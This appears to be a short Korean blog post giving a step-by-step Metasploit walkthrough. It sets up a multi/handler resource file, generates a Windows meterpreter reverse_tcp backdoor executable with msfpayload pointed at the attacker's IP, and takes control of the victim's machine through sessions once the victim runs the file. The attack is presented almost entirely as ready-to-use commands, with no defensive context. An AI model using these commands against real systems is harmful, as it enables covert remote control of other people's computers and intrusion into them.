Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
Tags
- macos
- miniconda
- Kibana
- G-suite
- Windows
- 로그인불가
- Elasticsearch
- pfsense
- 한글가이드
- docker
- XCP-ng
- freebsd
- bash
- Kibana server is not ready yet
- PlayBook
- elastic stack
- centos 8
- Proxy
- xe guest utilities
- ansible
- application security
- proxycfg
- GitLab
- hardening
- ELASTIC
- endpoint security
- 보안양파
- x-pack
- ssh key 배포
Archives
- Today
- Total
선 밖에 선 자유인
Metasploit meterpreter를 이용한 침투 본문
- 리소스 파일 생성 (attacker_.rc)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set ExitSession false
exploit -j -z
- reverse_tcp 백도어 생성
msfpayload windows/meterpreter/reverse_tcp LHOST=<공격자 ip> X > reverse_tcp.exe
- 공격자 pc에서 리소스 실행
msfconsole -r attacker_.rc
- 사용자가 백도어를 실행하게 되면 reverse_tcp connection 연결
- 공격자는 sessions -i <번호>를 통해 meterpreter 조작 가능
Comments